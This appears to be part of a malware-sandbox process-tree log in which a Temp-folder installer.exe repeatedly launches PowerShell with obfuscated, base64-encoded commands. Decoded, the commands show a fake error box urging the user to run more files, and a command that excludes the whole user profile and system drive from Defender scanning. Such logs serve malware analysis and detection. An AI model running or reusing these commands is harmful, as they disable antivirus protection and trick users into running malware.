        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        177⤵
        
        PID:12100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        177⤵
        
        PID:12120
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        177⤵
        
        PID:12160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        178⤵
        
        PID:12224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        178⤵
        
        PID:12276
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        178⤵
        
        PID:11272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        179⤵
        
        PID:11540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        179⤵
        
        PID:11408
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        179⤵
        
        PID:11768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        180⤵
        
        PID:11616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        180⤵
        System Location Discovery: System Language Discovery
        
        PID:11684
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        180⤵
        
        PID:11868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        181⤵
        
        PID:12244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        181⤵
        System Location Discovery: System Language Discovery
        
        PID:11348
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        181⤵
        System Location Discovery: System Language Discovery
        
        PID:11680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        182⤵
        
        PID:12168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        182⤵
        
        PID:11748
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        182⤵
        
        PID:11044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        183⤵
        
        PID:9724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        183⤵
        
        PID:11672
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        183⤵
        
        PID:12212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        184⤵
        
        PID:11524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        184⤵
        System Location Discovery: System Language Discovery
        
        PID:11692
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        184⤵
        
        PID:12132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        185⤵
        
        PID:12044
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        185⤵
        
        PID:11680
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        185⤵
        
        PID:11808
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        186⤵
        
        PID:10540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        186⤵
        
        PID:11420
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        186⤵
        
        PID:11700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        187⤵
        
        PID:12084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        187⤵
        
        PID:11336
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        187⤵
        
        PID:10796
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        188⤵
        
        PID:12160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        188⤵
        
        PID:11008
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        188⤵
        
        PID:11652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        189⤵
        
        PID:12004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        189⤵
        
        PID:11764
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        189⤵
        
        PID:11608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        190⤵
        
        PID:12164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        190⤵
        
        PID:12072
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        190⤵
        
        PID:2776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        191⤵
        
        PID:11596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        191⤵
        
        PID:12216
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        191⤵
        
        PID:11608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        192⤵
        
        PID:12192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
